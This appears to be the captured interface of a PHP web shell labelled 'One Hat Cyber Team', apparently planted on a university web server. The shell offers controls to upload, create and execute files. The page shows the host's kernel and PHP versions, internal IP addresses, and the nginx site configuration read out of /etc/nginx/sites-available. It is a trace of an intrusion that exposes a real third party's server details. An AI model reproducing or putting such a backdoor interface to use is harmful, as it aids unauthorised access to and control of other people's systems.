⚝
One Hat Cyber Team
⚝
Your IP:
192.168.31.6
Server IP:
192.168.1.11
Server:
Linux pams 6.1.0-29-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.123-1 (2025-01-02) x86_64
PHP Version:
8.2.28
Buat File
|
Buat Folder
Upload File
Eksekusi
Dir :
~
/
etc
/
nginx
/
sites-available
/
Viewing : lppm
server { listen 80; set_real_ip_from 103.174.116.4; server_name lppm.local lppm.uidepok.ac.id www.lppm.uidepok.ac.id; root /var/www/lppm/public/; index index.php index.html index.htm; location / { # try_files $uri $uri/ =404; try_files $uri $uri/ /index.php?$query_string; } location ~ \.php$ { include snippets/fastcgi-php.conf; fastcgi_pass unix:/run/php/php8.2-fpm.sock; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; } location ~ /\.ht { deny all; } location ~ /\.env { deny all; } access_log /var/www/lppm/writable/logs/access.log; error_log /var/www/lppm/writable/logs/error.log error; }